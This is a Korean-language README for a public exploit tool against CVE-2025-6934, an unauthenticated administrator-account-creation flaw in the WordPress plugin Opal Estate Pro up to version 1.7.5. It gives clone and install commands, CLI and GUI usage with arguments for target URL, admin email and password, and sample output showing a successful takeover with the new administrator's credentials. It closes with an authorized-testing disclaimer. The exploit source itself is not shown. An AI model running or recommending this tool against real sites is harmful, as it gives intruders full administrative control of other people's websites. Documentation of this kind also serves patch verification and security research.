
CVE-2025-6934 익스플로잇 도구 - WordPress 플러그인 Opal Estate Pro의 인증되지 않은 관리자 계정 생성
전적으로 mejbankadir에 의해 생성 및 개발됨 (SMH tech 및 NexoAmicus 산하 Mejban HackSheild)
CVE-2025-6934는 WordPress Opal Estate Pro 플러그인(버전 <= 1.7.5)에서 인증되지 않은 공격자가 취약한 WordPress 사이트에 관리자 계정을 생성할 수 있는 심각한 취약점입니다.
이 도구는 이 취약점을 악용하기 위한 CLI(명령줄) 및 GUI(그래픽 사용자 인터페이스) 버전을 제공합니다.
| 속성 | 값 |
|---|---|
| CVE ID | CVE-2025-6934 |
| 심각도 | Critical (CVSS 3.1: 9.8) |
| 영향받는 플러그인 | Opal Estate Pro |
| 영향받는 버전 | <= 1.7.5 |
| 취약점 유형 | Unauthenticated Administrator Account Creation |
| CVSS 벡터 | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
# 저장소 복제
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934
# 의존성 설치
pip install -r requirements.txt
requests
beautifulsoup4
colorama
PyQt6 # GUI 버전 전용
python3 CVE-2025-6934-GUI.py
GUI 기능:
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123
인수:
-u, --url 대상 URL (필수)
-mail, --newmail 관리자 계정 이메일 (필수)
-password, --newpassword 관리자 계정 비밀번호 (필수)
-user, --username 관리자 계정 사용자명 (기본값: administrator)
┌─────────────────────────────────────────────────────────────┐
│ _____________ _______________ │
│ \_ ___ \ \ / /\_ _____/ │
│ / \ \/\ Y / | __)_ ______ │
│ \ \____\ / | \ /_____/ │
│ \______ / \___/ /_______ / │
│ \/ \/ │
│ │
│ CVE-2025-6934 Exploit PoC │
│ │
│ Created and developed fully by mejbankadir │
│ (SMH tech and Mejban HackSheild Under NexoAmicus) │
└─────────────────────────────────────────────────────────────┘
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123
[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
Username : administrator
Email : [email protected]
Password : MyP@ss123
Role : administrator
⚠️ 경고: 이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
컴퓨터 시스템에 대한 무단 액세스는 불법이며 비윤리적입니다.
이 도구를 사용함으로써 다음 사항에 동의하는 것으로 간주됩니다:
- 소유하거나 테스트할 명시적 권한이 있는 시스템만 테스트합니다
- 악의적인 목적으로 이 도구를 사용하지 않습니다
- 모든 법적 결과에 대한 책임을 수락합니다
| 역할 | 이름 |
|---|---|
| 생성자 및 개발자 | mejbankadir |
| 조직 | SMH tech 및 NexoAmicus 산하 Mejban HackSheild |
CVE-2025-6934/
├── CVE-2025-6934.py # CLI 버전
├── CVE-2025-6934-GUI.py # GUI 버전
├── CVE-2025-6934.yaml # 문서
├── requirements.txt # Python 의존성
└── README.md # 이 파일
도구는 자동으로 SSL 경고를 비활성화합니다. 문제가 발생하면:
requests.packages.urllib3.disable_warnings()
MIT License
Copyright (c) 2025 mejbankadir (SMH tech 및 NexoAmicus 산하 Mejban HackSheild)
mejbankadir이 ❤️로 만듦
SMH tech | Mejban HackSheild | NexoAmicus 산하